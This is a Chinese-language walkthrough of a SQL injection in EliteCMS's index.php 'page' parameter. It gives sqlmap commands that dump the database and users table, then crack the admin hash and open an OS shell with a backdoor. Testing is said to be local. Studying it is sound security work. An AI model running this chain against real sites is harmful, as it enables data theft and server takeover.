ellite sql注入

語言: CN / TW / HK

本地環境搭建:

官網下載:http://www.elitecms.net/

安裝步驟:

前臺效果:

後臺效果:

程式碼分析

安裝完以後,直接產看程式碼的檔案,全域性正則匹配select .*? where

快速通讀下程式碼上下文,這裡沒有加過濾。接著搜尋哪裡呼叫了這個函式。

這裡有呼叫,而且沒有過濾,直接訪問頁面,抓包。

無需使用者登入直接訪問URL:http://www.elitecms.com/index.php?page=1

手動在page中構建payload,在page=1後面直接加個單引號,進行驗證。

訪問後,資料庫返回來頁面錯誤

很明顯這裡有注入,用SQLmap跑一下資料庫資訊

sqlmap命令:
sqlmap -u “http://www.elitecms.com/index.php?page=1" –current-db –batch

資料庫名資訊:

然後使用下面這個命令獲取資料庫表資訊

sqlmap -u “http://www.elitecms.com/index.php?page=1" -D elitecms –tables  –batch:

然後使用下面這個命令獲取使用者表裡的欄位資訊:

sqlmap -u “http://www.elitecms.com/index.php?page=1" -D elitecms -T users –columns  –batch

最後獲得管理員使用者資訊,使用下面命令:

通過上面的hash值,藉助第三方平臺拿下明文密碼:

此時進入系統後臺:

拿下系統後臺許可權,可以使用後臺的全部功能。

接著通過—os-shell的選項,拿下服務許可權,命令如下:sqlmap -u “http://www.elitecms.com/index.php?page=1" –os-shell,

在過程中填寫路徑的時候,填上我們的實際路徑就好,如下圖所示:

選擇2,在下面填寫路徑,最後結果返回系統shell,同時建立了後門檔案。通過shell執行系統命令:

也可訪問後門檔案:

至此,通過前臺檔案index.php,無需使用者登入,實現了拿系統後臺許可權,和伺服器許可權。造成了非常嚴重的後果。全過程都在本地虛擬機器中進行的測試,域名也是解析的本地解析。

Tide安全團隊正式成立於2019年1月,是新潮資訊旗下以網際網路攻防技術研究為目標的安全團隊,團隊致力於分享高質量原創文章、開源安全工具、交流安全技術,研究方向覆蓋網路攻防、系統安全、Web安全、移動終端、安全開發、物聯網/工控安全/AI安全等多個領域。

團隊作為“省級等保關鍵技術實驗室”先後與哈工大、齊魯銀行、聊城大學、交通學院等多個高校名企建立聯合技術實驗室。 團隊公眾號自建立以來,共釋出原創文章400餘篇,自研平臺達到31個,目有18個平臺已開源。此外積極參加各類線上、線下CTF比賽並取得了優異的成績。如有對安全行業感興趣的小夥伴可以踴躍加入或關注我們